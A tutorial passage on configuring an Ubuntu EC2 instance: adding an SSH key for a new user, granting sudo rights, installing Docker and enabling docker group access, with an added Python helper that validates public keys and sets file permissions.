Note: if nano or vim is not available as ninja, log out of the ninja user, install nano or vim as the user ubuntu, and then switch to ninja again:

$ sudo su - ninja

Now paste the key you got from the ssh-keygen command. It will look something like the image below.

Copy it and paste it under .ssh/authorized_keys. The filename must be exactly authorized_keys (American spelling): sshd does not read a file called authorised_keys, and the login will fail with no obvious reason.

Use nano to open the file:

$ nano .ssh/authorized_keys

If the command $ ssh-keygen -y -f myprivatekey.pem fails, make sure the private key "myprivatekey.pem" has restrictive permissions (400); if not, set them:

$ chmod 400 myprivatekey.pem

Now log in using SSH, but this time the user name is ninja:

$ ssh -i "myprivatekey.pem" ninja@public-dns.compute.amazonaws.com
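
Added example, not from the page: a Python helper that does the .ssh/authorized_keys setup above with the permissions sshd's StrictModes expects and, before appending a key, checks that the pasted line is a structurally valid OpenSSH public key (the type in the text field must match the type encoded at the start of the base64 blob, which catches truncated or line-wrapped pastes). The sample key produced by demo_key is constructed and not a real key; function names and the home-directory argument are mine.

```python
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path


def parse_pubkey(line: str) -> str:
    """Validate one OpenSSH public-key line ('<type> <base64> [comment]') and return the key type.

    OpenSSH key blobs start with a length-prefixed copy of the key type, so the text field and
    the blob must agree. A line that was truncated or line-wrapped while pasting fails here,
    instead of being silently ignored by sshd at login time.
    """
    fields = line.split()
    if len(fields) < 2:
        raise ValueError("expected '<type> <base64> [comment]'")
    key_type, blob_b64 = fields[0], fields[1]
    try:
        blob = base64.b64decode(blob_b64, validate=True)
        (n,) = struct.unpack(">I", blob[:4])
        embedded = blob[4:4 + n].decode("ascii")
    except (ValueError, struct.error, UnicodeDecodeError) as exc:
        raise ValueError(f"malformed key blob: {exc}") from None
    if embedded != key_type:
        raise ValueError(f"type field {key_type!r} does not match blob type {embedded!r}")
    return key_type


def install_authorized_key(home: Path, line: str) -> Path:
    """Create ~/.ssh (0700) and append the key to authorized_keys (0600), idempotently.

    A group- or world-writable .ssh directory or key file makes sshd (StrictModes yes, the
    default) ignore the keys without any hint to the user, hence the explicit chmods.
    """
    parse_pubkey(line)
    ssh_dir = home / ".ssh"
    ssh_dir.mkdir(mode=0o700, exist_ok=True)
    os.chmod(ssh_dir, 0o700)  # mkdir's mode is subject to the umask, so set it explicitly
    auth = ssh_dir / "authorized_keys"  # exact name: sshd does not read 'authorised_keys'
    existing = auth.read_text().splitlines() if auth.exists() else []
    if line.strip() not in existing:
        with open(auth, "a") as fh:
            fh.write(line.strip() + "\n")
    os.chmod(auth, 0o600)
    return auth


def permissions_ok(home: Path) -> bool:
    """Stricter than sshd's own check: nobody but the owner may touch .ssh, and nobody else may write the key file."""
    ssh_dir = home / ".ssh"
    auth = ssh_dir / "authorized_keys"
    if not (ssh_dir.is_dir() and auth.is_file()):
        return False
    mode = lambda p: stat.S_IMODE(p.stat().st_mode)
    return mode(ssh_dir) & 0o077 == 0 and mode(auth) & 0o022 == 0


def demo_key(comment: str = "ninja@example") -> str:
    """A structurally valid ssh-ed25519 line with an all-zero public key: constructed for tests, not a real key."""
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + bytes(32)
    return f"ssh-ed25519 {base64.b64encode(blob).decode()} {comment}"


def demo_install() -> bool:
    """Install the demo key twice into a scratch home; True if perms are right and the line is not duplicated."""
    with tempfile.TemporaryDirectory() as d:
        home = Path(d)
        install_authorized_key(home, demo_key())
        auth = install_authorized_key(home, demo_key())
        return permissions_ok(home) and len(auth.read_text().splitlines()) == 1


if __name__ == "__main__":
    print("parsed type:", parse_pubkey(demo_key()))
    print("scratch install ok:", demo_install())
```

Run it as the target user with home=Path.home() and the line from ssh-keygen -y; the validation step is the part that saves the most time in practice, because a key that sshd rejects produces nothing more than "Permission denied (publickey)" on the client side.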

Adding a sudoers entry for user ninja
  • Log in to your EC2 Ubuntu instance as the default user ubuntu.

  • To add ninja to sudoers, follow the steps below.

$ sudo nano /etc/sudoers

I have highlighted the User privilege specification section.

  • Add ninja ALL=(ALL) NOPASSWD:ALL just below root ALL=(ALL:ALL) ALL. Follow the screenshot for a better understanding. Editing /etc/sudoers with a plain editor is risky: a single syntax error locks everyone out of sudo. Prefer sudo visudo, which checks the syntax before saving, or put the line in its own file under /etc/sudoers.d/ and validate it with visudo -cf. Note also that NOPASSWD:ALL makes ninja's SSH private key equivalent to root on this host; protect it accordingly.

Exit and log in again as user ninja; now you will not be asked for a password again and again while installing Docker or performing any other action.

Installing Docker

We will start by first updating existing list of packages.

$ sudo apt update

Now, let's install the prerequisite packages so that apt can fetch packages over HTTPS.

$ sudo apt install apt-transport-https ca-certificates curl software-properties-common

Add the GPG key for the official Docker repository:

$ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -

This trusts whatever the download served, so verify the key's fingerprint (apt-key fingerprint shows it) against the one published in the Docker docs before going on. apt-key is deprecated on Ubuntu 22.04 and later, where the key is stored in a keyring file that the repository line references with signed-by; the commands above are for 18.04 and 20.04.

Now add the Docker repo to the APT sources. bionic is the codename of Ubuntu 18.04, so substitute your release's codename:

sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable" && sudo apt update

To check the Docker repo version table and the installation candidate, use the command below.

$ apt-cache policy docker-ce

Finally, lets install Docker

$ sudo apt install docker-ce

To check whether Docker is running:

$ sudo service docker status
Executing Docker commands without sudo:

Typing sudo again and again is tedious because the Docker CLI talks to a root-owned socket. Docker therefore provides a docker group whose members can use that socket without sudo. Be aware that this is a root-equivalent privilege: anyone in the docker group can start a container with the host filesystem mounted and become root on the host, so treat docker group membership exactly like sudo access. To add yourself:

$ sudo usermod -aG docker ${USER}

Log out and back in for the new group membership to take effect (a reboot is not required).

You may also name the user explicitly. For example:

$ sudo usermod -aG docker pankaj